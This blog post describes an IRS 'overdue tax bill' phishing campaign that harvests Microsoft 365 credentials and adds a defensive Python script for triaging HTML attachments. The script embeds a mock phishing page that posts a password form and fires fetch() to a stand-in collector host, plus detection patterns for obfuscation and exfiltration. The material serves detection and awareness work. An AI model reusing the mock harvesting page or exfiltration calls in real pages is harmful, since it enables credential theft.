New IRS Phishing Scam Uses Fake Notices to Steal Microsoft 365 Credentials

Scammers use an “overdue tax bill” lure along with a sophisticated, obfuscated JavaScript-based “invoice” attachment to identify targeted victims, validate credentials, and transmit them within seconds.

There’s a common theme that runs through just about every phishing scam that has come across my desk: some element of the theming or the message is designed both to get the recipient’s attention and to turn that recipient into a victim by getting them to act in the way the attacker wants.

A new scam identified by the Resecurity HUNTER team shows how far a simple claim can go: an email purporting to come from the Internal Revenue Service tells the recipient that they owe money and that the payment is overdue.

In the following scam email, you’ll notice the semi-believable “irs [at]” email address, along with the request to view an attached HTML file “to view and pay the invoice”.


Diving into the attachment, Resecurity found that the HTML file contains obfuscated JavaScript code that does the following:

  • Checks the victim’s location based on IP address to selectively target countries or regions
  • Presents a spoofed Microsoft 365 logon screen
  • If credentials are entered, checks their validity by attempting to log on to Microsoft 365 via IMAP
  • Transmits the credentials back to a threat-actor-controlled server
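As an added illustration (not code from Resecurity or from this post), the following static triage script flags an HTML attachment that shows the four traits listed above using simple heuristics, without ever executing the script. The two sample pages and the collector.example host are constructed for the example.

```python
"""Static triage of an HTML email attachment for the traits described above:
obfuscated JavaScript, a spoofed credential form, geolocation gating and
external transmission. Constructed samples; no script is ever executed."""
import math
import re

# Generic JavaScript/HTML patterns, not indicators taken from this campaign.
SCRIPT_BLOCK = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
OBFUSCATION = re.compile(r"\b(eval|unescape|atob|String\.fromCharCode)\b")
LONG_BLOB = re.compile(r"[A-Za-z0-9+/=%]{200,}")
PASSWORD_FIELD = re.compile(r"type\s*=\s*['\"]?password", re.I)
EXFIL = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b|action\s*=\s*['\"]https?://", re.I)
GEOIP = re.compile(r"geolocation|geoip|ipinfo|ipapi|country_code", re.I)

def shannon_entropy(text):
    """Bits per character; packed or encoded script tends to exceed ~5.0."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(text.count(c) / n * math.log2(text.count(c) / n) for c in set(text))

def triage_html(html):
    """Return a sorted list of findings, one per trait in the write-up."""
    js = "\n".join(SCRIPT_BLOCK.findall(html))
    findings = set()
    if OBFUSCATION.search(js) or LONG_BLOB.search(js) or shannon_entropy(js) > 5.0:
        findings.add("obfuscated_javascript")
    if PASSWORD_FIELD.search(html):
        findings.add("credential_form")
    if EXFIL.search(html):
        findings.add("external_transmission")
    if GEOIP.search(js):
        findings.add("geolocation_check")
    return sorted(findings)

# Constructed samples: a harmless invoice page and a mock-up showing the traits.
BENIGN = "<html><body><h1>Invoice 1001</h1><p>Total due: $42.00</p></body></html>"
SUSPICIOUS = """<html><body>
<form action="https://collector.example/post" method="post">
 <input name="u"><input type="password" name="p"></form>
<script>
 if (geo.country_code !== "US") { location.replace("about:blank"); }
 eval(unescape("%61%6c%65%72%74%28%31%29"));  /* decodes to alert(1) */
 fetch("https://collector.example/log", {method: "POST"});
</script></body></html>"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, triage_html(sample))
```

Run over a mail gateway’s quarantined HTML attachments, the findings list is what you would feed into a triage queue or a detection rule; a page that trips all four traits deserves a closer look.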

If you look again at the email initially sent, you can make a pretty easy case for Security Awareness Training; the signs are obvious to a) someone who knows what to look for and b) someone who is actively on the lookout for malicious emails. That is the kind of employee that continual Security Awareness Training creates.
